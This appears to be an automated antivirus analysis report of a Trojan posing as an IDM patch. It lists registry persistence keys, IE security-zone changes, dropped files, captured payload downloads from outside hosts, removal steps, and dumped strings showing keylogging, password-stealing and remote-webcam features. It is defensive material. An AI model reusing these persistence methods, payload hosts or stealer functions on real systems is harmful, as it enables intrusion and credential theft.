"ProxyBypass" = "1"
The process FB_1.tmp.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 93 15 00 08 2E FE 56 C6 77 F6 2F 6F A1 AA BB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software]
"pth" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
"MTX" = "e45b0a7574b2e3981138c55b46daa7852d30cbd7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:\375569]
"mswindows.exe" = "mswindows"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software]
"zlODO3lxlyCXvdyvSwi5GQ==" = "qgng2IcmSCALK9lEqW0hOA=="
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software]
"prc" = "1452"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"UserInit" = "userinit.exe,%System%\clientsvr.exe"
The process xvnsxkn9.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE F1 16 B2 01 77 18 E9 F1 CF 01 C4 EC E3 EA 33"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 6g4zx02q.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 C4 43 43 13 60 C1 A1 10 87 22 4C 76 52 9B 60"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
2957b873533fc8571480069ab5b8746d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6g4zx02q.exe |
7fb59dc082e50a3f3d725ef0c25f0bea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\FB_1.tmp.exe |
1e68bbae05d390109bee5e5ac1605aff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\FB_2.tmp.exe |
f0e3f455c3b2630badf1888b911d374c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\b09bbc0c.exe |
20b782ed1f7216ec8e1cc95583d013eb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bch_h8mn.exe |
989028e4bb41cf1219bc6a0482a3b2cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\honmznj1.exe |
3497875e4db4dd5424e846ff019ca054 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\xvnsxkn9.exe |
7fb59dc082e50a3f3d725ef0c25f0bea | c:\WINDOWS\system32\clientsvr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
RtlGetNativeSystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mswindows.exe:436
b09bbc0c.exe:212
csc.exe:2616
csc.exe:3560
csc.exe:4040
csc.exe:3144
csc.exe:2456
csc.exe:3324
csc.exe:1936
csc.exe:2696
bch_h8mn.exe:2760
honmznj1.exe:3400
%original file name%.exe:1780
%original file name%.exe:580
ping.exe:2120
ping.exe:268
ping.exe:3496
ping.exe:2840
ping.exe:2948
ping.exe:2792
ping.exe:2504
ping.exe:3720
ping.exe:500
cvtres.exe:4056
cvtres.exe:3204
cvtres.exe:2624
cvtres.exe:3340
cvtres.exe:3608
cvtres.exe:2468
cvtres.exe:244
cvtres.exe:2748
system.exe:3452
system.exe:2308
system.exe:4032
system.exe:2688
system.exe:3312
system.exe:2796
system.exe:376
qrv670kf.exe:3256
qkjdmucq.exe:2752
FB_1.tmp.exe:1452
xvnsxkn9.exe:2036
6g4zx02q.exe:3644
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\4.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe (17178 bytes)
%System%\clientsvr.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC16.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCE.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC19.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC14.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC8.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC4.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FB_1.tmp.exe (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FB_2.tmp.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESF.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES1A.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES17.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES9.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES15.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES5.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.0.cs (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.0.cs (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.0.cs (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.0.cs (229 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
- Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"UserInit" = "userinit.exe,%System%\clientsvr.exe"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: www.crackingpatching.com
Product Name: C:\Users\Blue\Desktop\32bit Patch build 11.exe
Product Version: 1,0,0,1
Legal Copyright: www.crackingpatching.com
Legal Trademarks:
Original Filename: C:\Users\Blue\Desktop\32bit Patch build 11.exe
Internal Name: C:\Users\Blue\Desktop\32bit Patch build 11.exe
File Version: 1,0,0,1
File Description: IDM Patch 6.23.b.11 Installation
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 8852 | 12288 | 3.09822 | dfc8b6fd701d313a254222442ae77cd1 |
.rsrc | 24576 | 2558556 | 2560000 | 5.41965 | 9c49e9055795b5aca864963ce017489f |
.reloc | 2588672 | 12 | 4096 | 0.009099 | c200c86001b306e4bb91ec5bf08a7051 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ge.tt/api/1/files/9UqgwvG2/0/blob?download | 54.195.252.180 |
hxxp://s3-3-w.amazonaws.com/gett/9UqgwvG2/highminer.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=F2D0ijJ7bxCc3qgWfHy0EFjdjcE=&Expires=1433366459 | |
hxxp://directexe.com/5DV/Dunk.exe | 104.18.58.181 |
hxxp://directexe.com/5DV/Dunk.exe?download_token=55b3fba8d3b39e262afce4b9db568b3fb6321d6bd27219929b7e0ab453c89d97 | 104.18.58.181 |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/9UqgwvG2/highminer.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=F2D0ijJ7bxCc3qgWfHy0EFjdjcE=&Expires=1433366459 | 54.231.133.193 |
smaxzax.ddns.net | 88.150.224.102 |
open.ge.tt | 54.247.122.87 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /gett/9UqgwvG2/highminer.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=F2D0ijJ7bxCc3qgWfHy0EFjdjcE=&Expires=1433366459 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: 6mhZ IOeB525zSJeUdutddXByZVEBKzmsFabpyfuspmyS7lQdGrfsus5XJgzuZO9WopaRAkMZC8=
x-amz-request-id: CCACDA724432611F
Date: Wed, 03 Jun 2015 21:11:10 GMT
Content-Disposition: attachment;
Last-Modified: Sat, 23 May 2015 04:41:37 GMT
ETag: "33b9f4f5c11b116c154ab3d0b2553d00-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 2329600
Server: AmazonS3
<<< skipped >>>
GET /5DV/Dunk.exe HTTP/1.1
Host: directexe.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Wed, 03 Jun 2015 21:11:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1c3be5dd98c19292a1354396503f39ae1433365869; expires=Thu, 02-Jun-16 21:11:09 GMT; path=/; domain=.directexe.com; HttpOnly
X-Powered-By: PHP/5.4.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: filehosting=ef917cbe5ac747329b78c315718c3aa0; expires=Thu, 04-Jun-2015 21:11:09 GMT; path=/
location: hXXp://directexe.com/5DV/Dunk.exe?download_token=55b3fba8d3b39e262afce4b9db568b3fb6321d6bd27219929b7e0ab453c89d97
Vary: User-Agent
Server: cloudflare-nginx
CF-RAY: 1f0e638e5be00f69-FRA
GET /5DV/Dunk.exe?download_token=55b3fba8d3b39e262afce4b9db568b3fb6321d6bd27219929b7e0ab453c89d97 HTTP/1.1
Host: directexe.com
HTTP/1.1 200 OK
Date: Wed, 03 Jun 2015 21:11:10 GMT
Content-Type: application/octet-stream
Content-Length: 279552
Connection: keep-alive
Set-Cookie: __cfduid=deed0d8ff4291397a3b46f4755a45cdb11433365870; expires=Thu, 02-Jun-16 21:11:10 GMT; path=/; domain=.directexe.com; HttpOnly
X-Powered-By: PHP/5.4.40
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Disposition: attachment; filename="Dunk.exe"
Content-Description: File Transfer
Accept-Ranges: bytes
Access-Control-Allow-Origin: hXXp://directexe.com
Access-Control-Allow-Headers: Content-Type, Content-Range, Content-Disposition, Content-Description
Access-Control-Allow-Credentials: true
Set-Cookie: filehosting=93a75c0f82746c9de7f6c3d9a9b2a00a; expires=Thu, 04-Jun-2015 21:11:10 GMT; path=/
Content-Range: bytes 0-279551/279552
Vary: User-Agent
Server: cloudflare-nginx
CF-RAY: 1f0e63913c740f69-FRA
<<< skipped >>>
GET /api/1/files/9UqgwvG2/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXps://open.ge.tt/1/files/9UqgwvG2/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
FB_2.tmp.exe_612:
.idata
.rdata
P.reloc
P.rsrc
uxtheme.dll
c:\delphi7\Lib\KOL\KOL.pas
Unsupported bitmap format
PSAPI.dll
kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
WinExec
gdi32.dll
GetKeyState
ExitWindowsEx
EnumWindows
winmm.dll
ole32.dll
comctl32.dll
shell32.dll
GetWindowsDirectoryA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteA
cabinet.dll
KWindows
UrlMon
version="1.0.0.0"
name="Microsoft.Windows.SIM"
Sandyseedings @ VVV.crackingpatching.com...
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
VVV.crackingpatching.com
FB_2.tmp.exe_612_rwx_00C2D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_2.tmp.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
FB_2.tmp.exe_612_rwx_00C4D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_2.tmp.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
system.exe_2448:
.text
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
v2.0.50727
System.Threading
Microsoft.VisualBasic
Operators
Microsoft.VisualBasic.CompilerServices
System.Net.Sockets
System.Diagnostics
System.Text
WebClient
System.Net
System.IO
WebHeaderCollection
System.ComponentModel
System.Collections.Generic
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
TcpClient
System.Drawing
System.Windows.Forms
SendKeys
System.Drawing.Drawing2D
CopyPixelOperation
System.Security.Cryptography
System.Drawing.Imaging
System.IO.Compression
AForge.Video.DirectShow
AForge.Video
System.Collections
System.Runtime.CompilerServices
System.Reflection
System.Runtime.InteropServices
Keyboard
Keys
System.Security
System.Security.AccessControl
System.Security.Principal
System.Resources
Microsoft.VisualBasic.ApplicationServices
InvalidOperationException
System.Configuration
System.Collections.ObjectModel
Microsoft.VisualBasic.FileIO
System.Timers
Microsoft.Win32
System.Management
RegistryKey
WebBrowser
System.Net.NetworkInformation
WindowsIdentity
WindowsPrincipal
WindowsBuiltInRole
System.Text.RegularExpressions
PortableExecutable
JLibrary.PortableExecutable
System.Globalization
.ctor
GetExecutingAssembly
get_Keyboard
get_ShiftKeyDown
get_Port
ContainsKey
get_ExecutablePath
set_UseShellExecute
OpenSubKey
CreateSubKey
set_Key
b.Rummage.exe
winmm.dll
user32.dll
GetKeyboardState
MapVirtualKey
SetWindowsHookEx
User32.dll
UnhookWindowsHookEx
GetKeyboardLayout
kernel32.dll
ntdll.dll
advapi32.dll
.cctor
Srclient.dll
registryKey_0
wintrust.dll
SetThreadExecutionState
RegOpenKeyEx
tb.resources
ub.resources
b.Resources.resources
System.Windows.Forms.Form
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
$3a574e5b-bd2e-4e23-a175-583f6c78f50f
0.0.0.0
_CorExeMain
mscoree.dll
HTTP POST
hXXp://
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
HTTP TIMEOUT
HTTP GET
HEAD / HTTP/1.1
POST / HTTP/1.1
GET / HTTP/1.1
Downloaded and Executed File At:
HTTPControl
C:\windows\system32\drivers\etc\hosts
PASSWORDS*
Starting Remote Webcam
WEBCAM*
Error Starting Remote Webcam:
.log.txt
21e4ae94-fc15-47ca-aae4-f06ec0e0544dec7443df-8698-4
b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
httpget
134f35e1-1a49-4c15-8a65-b6db57c3d3dcf2
posthttp
Cannot Get Saved Keylogs:
Cannot Read Saved Keylog:
cmd.exe
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
1314591
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
CMDOn
CMDOff
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
DisableCMD
SAPI.Spvoice
explorer.exe
csrss.exe
\\.\root\default
\uTorrent\uTorrent.exe
\qBittorrent\qbittorrent.exe
\BitTorrent\bittorrent.exe
\BitTorrent\BitTorrent.exe
\Vuze\Azureus.exe
software\Microsoft\Windows\CurrentVersion\Run
software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\Run\
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Specify a Password
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
*Windows 8
Windows 10
*Windows Vista
Windows 8
*Windows XP
Windows 7
*Windows 10
*Windows 7
*Windows Server
Windows
*Windows
KEYLOGS*
WEBCAM
PASSWORDS
RESETPASSWORD
9454f305-8ee5-4fb2-aea3-b9ae9f1a985de3de48a9-d6e2-455d-8490-4d4d6a0a8e8147b7c1ef-394e-
Invalid Webcam Driver Download URL, or Failed to Download File!
Cannot Load Webcam Driver:
Opened Website:
InternetExplorer.Application
hXXp://cachefly.cachefly.net/5mb.test
Win32_Processor.deviceid="CPU0"
ms.ini
Invalid Password Recovery Download URL, or Failed to Download File!
Cannot Recover Passwords. Error:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SELECT * FROM Win32_OperatingSystem
\FileZilla\recentservers.xml
(. ?)\s . \s . \s . \s (. ?)\s (. ?)
Password
Cannot Obtain Passwords:
vbc.exe
csc.exe
AppLaunch.exe
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
explorer.exe,"
\clientsvr.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe,"
clientsvr.exe
:Zone.Identifier
b.Resources
DW20.EXE_2548:
.text
.text
`.data
`.data
.cdata
.cdata
.rsrc
.rsrc
watson.microsoft.com
watson.microsoft.com
.mdmp
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Failed to fill report params from generic params
Not offering reporting
Not offering reporting
%s Mode
%s Mode
Failed to get a reporting destination
Failed to get a reporting destination
Nothing to report from queue
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Ignoring %S due to unknown queue version
Reporting is disabled
Reporting is disabled
SignOff queue reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
Bad queue type to report from
No reports for given queue mask - %u
No reports for given queue mask - %u
Invalid queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
CreateWindowExA failed with %d.
Application Error Reporting %d
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
WatsonQueuedReportingInstanceVerification
riched20.dll
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
dwintl20.dll
Launching lightweight browser with URL
Launching lightweight browser with URL
mshtml.dll
mshtml.dll
Not reporting
Not reporting
Reporting
Reporting
DWBypassQueue
DWBypassQueue
DWExplainerURL
DWNoSignOffQueueReporting
DWAlwaysReport
DWReporteeName
DWURLLaunch
DWNoExternalURL
DWStressReport
ole32.dll
imm32.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
https
DwBTLog.log
Failed to get minidump for %S!
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppStamp=x
szModName=%s
szModVer=%d.%d.%d.%d
szModStamp=x
fDebug=%s
offset=x
microsoft.com
.msn.com
.microsoft.com
d:d:d d-d-d
/dw/generictwo.asp
kernel32.dll
psapi.dll
mso.dll
MsoDWRecover%x
MsoDWHang%x
Launching browser with URL
shell32.dll
%d.%d.%d.%d
